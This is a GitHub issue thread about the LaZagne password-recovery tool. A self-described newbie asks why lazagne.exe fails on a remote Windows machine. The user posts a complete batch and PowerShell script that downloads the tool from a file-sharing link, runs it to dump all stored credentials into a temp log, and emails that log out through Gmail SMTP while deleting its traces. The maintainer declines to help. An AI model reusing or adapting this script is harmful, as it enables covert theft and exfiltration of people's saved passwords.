### ISSUE TITLE
The system can't run the specified program

### ISSUE THREAD

**Issue by Lemur420** [AlessandroZ/LaZagne#396]
I downloaded the lazagne 2.4.2 from https://github.com/AlessandroZ/LaZagne/releases/
trying to run it on a remote system but i get error "The system can't run the specified program"

any fix ?

ps. i am total newbie in Linux and commands etc.........

**Comment by eranzim** [comment]
Could you please specify which file you ran, what was the command line, and the exact Linux version you're using (including bitness)?

**Comment by Lemur420** [comment]
@eranzim thanks for the reply bro , i am running Kali linux 64 bit, version 2019.1a  in vmware workstation, 

i used a script to remotely run the lazagne 2.4.2 exe [ here is a photo of the program https://prnt.sc/niatdn ]  on a windows machine which is also installed in vmware , here is the script code 

`@echo off

set downloadURL=https://www59.zippyshare.com/d/4YW9vFSf/940670/lazagne.exe
set email=***xrx@gmail.com
set password=******g3nD

set exeFile=%TEMP%\proc.exe
set logFile=%TEMP%\proclog.txt
set arguments=all


powershell (new-object System.Net.WebClient).DownloadFile('%downloadURL%','%exeFile%');
%exeFile% %arguments% > %logFile%

del %exeFile%

powershell $SMTPServer = 'smtp.gmail.com';$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587);$SMTPInfo.EnableSsl = $true;$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('%email%', '%password%');$ReportEmail = New-Object System.Net.Mail.MailMessage;$ReportEmail.From = '%email%';$ReportEmail.To.Add('%email%');$ReportEmail.Subject = 'Lazagne Report';$ReportEmail.Body = 'Lazagne report in the attachments.';$ReportEmail.Attachments.Add('%logFile%');$SMTPInfo.Send($ReportEmail);

del %logFile%``


sorry for censoring the email ;D and thanks in advance bro.

**Comment by AlessandroZ** [comment]
Sorry I cannot help you. Check older issues to check if you find a similar problem.
